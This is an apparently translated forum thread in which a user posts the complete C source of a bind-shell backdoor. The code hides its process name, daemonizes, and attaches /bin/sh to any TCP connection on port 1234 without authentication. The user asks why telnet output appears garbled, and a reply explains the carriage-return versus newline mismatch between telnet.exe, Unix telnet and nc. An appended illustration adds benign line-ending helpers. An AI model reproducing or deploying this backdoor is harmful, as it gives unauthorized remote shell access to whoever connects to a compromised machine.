Emm replies explaining Telnet and NC

Source: Internet
Author: User
A question about bindshell.c! Please advise! Thank you!

After running the bindshell program, I use another computer to connect to the program's listening port. Once connected, we find that the output strings are not positioned the way we usually see them; with ls -l it is even more obvious! Their positions follow a certain rule, but the layout is not normal. I don't know how to solve this problem?

How can I add code to solve this problem?

What knowledge should I use? Is it an output redirection?

I am just getting started with these things. I hope someone can give me some advice! Can you help me out?

The code is from ayazero!

/*
 * Unknown author.
 */

#define PORT 1234
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, server_pid, cli_pid;
socklen_t soc_len;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main(int argc, char *argv[])
{
    int i;
    /* Overwrite the original argv strings */
    for (i = 0; i < argc; i++) {
        memset(argv[i], '\x0', strlen(argv[i]));
    }
    strcpy(argv[0], "th1s iz my 3l1t3 backd00r");

    /* Create the TCP socket and bind it to PORT on all interfaces */
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);
    /* Detach from the controlling terminal (double fork) */
    if (fork() != 0)
        exit(0);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);
    /* Accept loop: each connection gets stdin/stdout/stderr attached to /bin/sh */
    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            dup2(soc_cli, 0);
            dup2(soc_cli, 1);
            dup2(soc_cli, 2);
            execl("/bin/sh", "sh", (char *) 0);
            close(soc_cli);
            exit(0);
        }
        close(soc_cli);
    }
}

How long is the code for the telnetd service? How long is the bindshell code?
A bindshell only lets you exec commands; it has neither the complete remote login protocol nor terminal session control support.

Envymask

Let us explain this question:

In the final analysis, it is the carriage return control character that is playing tricks here.

In addition, telnet.exe in windows is not intelligent enough.

In Windows, telnet.exe sends the command terminator by default according to the standard Telnet protocol: it uses \r as the command terminator. When you press Enter, only a single \r character is sent as the end of the command. However, the bindshell.c above obviously does not handle this command terminator, and \n is used as the command terminator instead. At this point, no matter what you enter, you will not see the expected results; you only see something like a flashing cursor, because no \n has been sent as the command terminator, so telnetd considers that the command has not finished being input and the result is never displayed. The solution is to set the Telnet environment variable with "set crlf". In this case, pressing Enter in telnet.exe sends \r\n. Although the command can then be executed successfully, you must append ";", and the output format is very messy. At last a ": Command not found" pops up, as the OP said.

Why does this happen? For the first question: telnet.exe sends \r\n, and bindshell.c treats everything before the \n, including the \r, as the command. For example, when you input "ls", the string actually sent to bindshell.c is "ls\r\n". bindshell.c takes \n as the command terminator and removes it, leaving "ls\r" rather than "ls". Of course, this command does not exist and returns "command not found". To get the real ls command to run, you need to send "ls;", so the string sent to bindshell.c is "ls;\r\n". With the \n control character removed, what remains is "ls;\r". Why does the execution succeed now? Because the ";" in the middle separates two commands: "ls" and "\r" are executed separately. The first one certainly succeeds, but the second, "\r", will not, because there is no "\r" command; it is only a control character. Therefore, after the ls command returns successfully, it is followed by "command not found". The second question concerns the output returned by ls. This is also because telnet.exe does not process the result returned by bindshell.c well: the line endings returned by bindshell.c are \n. I think if they were \r\n, the result would be printed to the console as expected.

The Telnet client in UNIX is more intelligent than the one in Windows. It automatically determines whether the current session is using the Telnet protocol; if not, it sends \n as the command terminator, which then matches bindshell.c, and everything works as if nothing were wrong.

nc is also a dummy: it too uses \n as the command terminator, but \n as the command terminator happens to be exactly what bindshell.c expects, so whether on Windows or UNIX, connecting with nc gives the expected results.

What I said above is the result of my own packet-capture analysis. If it is wrong, everyone is welcome to throw eggs at me, and I take no responsibility.
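As an added illustration (not code from the thread, from ayazero, or from any telnet/nc implementation), the following C functions model the terminator handling Envymask describes: a \n-only rule that leaves "ls\r" behind, against a CRLF-aware rule that accepts the bare \r of default telnet.exe, the \r\n of telnet.exe with crlf set, and the \n of nc, plus a stream splitter applying the CRLF-aware rule to a received buffer. The function names and the sample inputs in the comments are constructed for this example.

```c
#include <string.h>

/* Added illustration (not code from the thread). Remove the terminator from
 * `line`: with crlf_aware == 0 only '\n' is recognised, leaving "ls\r\n" as
 * "ls\r" (the symptom described); otherwise "\r\n", "\n" and bare "\r" go. */
size_t strip_eol(char *line, int crlf_aware)
{
    size_t n = strlen(line);
    if (n > 0 && line[n - 1] == '\n')
        line[--n] = '\0';
    if (crlf_aware && n > 0 && line[n - 1] == '\r')
        line[--n] = '\0';
    return n;
}

/* Apply strip_eol to a copy of `raw`; returns 1 if the result equals `want`. */
int normalizes_to(int crlf_aware, const char *raw, const char *want)
{
    char tmp[64] = {0};
    strncpy(tmp, raw, sizeof tmp - 1);
    strip_eol(tmp, crlf_aware);
    return strcmp(tmp, want) == 0;
}

/* Stream form of the CRLF-aware rule: copy each complete line of `buf`,
 * minus its terminator, into out[]; a trailing partial line is not counted. */
int split_lines(const char *buf, char out[][32], int max_lines)
{
    int count = 0;
    size_t start = 0;
    for (size_t i = 0; buf[i] != '\0' && count < max_lines; i++) {
        if (buf[i] != '\n' && buf[i] != '\r')
            continue;
        size_t len = i - start < 31 ? i - start : 31;
        memcpy(out[count], buf + start, len);
        out[count++][len] = '\0';
        if (buf[i] == '\r' && buf[i + 1] == '\n')
            i++;                       /* swallow the LF of a CRLF pair */
        start = i + 1;
    }
    return count;
}

/* Returns 1 if line `idx` of `buf` (CRLF-aware splitting) equals `want`. */
int line_at_is(const char *buf, int idx, const char *want)
{
    char out[8][32];
    int n = split_lines(buf, out, 8);
    return idx < n && strcmp(out[idx], want) == 0;
}
```

With crlf_aware set to 0 only the nc-style "ls\n" input yields "ls"; with it set to 1 all three client variants do, and "ls;\r\n" becomes "ls;" with no stray \r left to be run as a second command.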
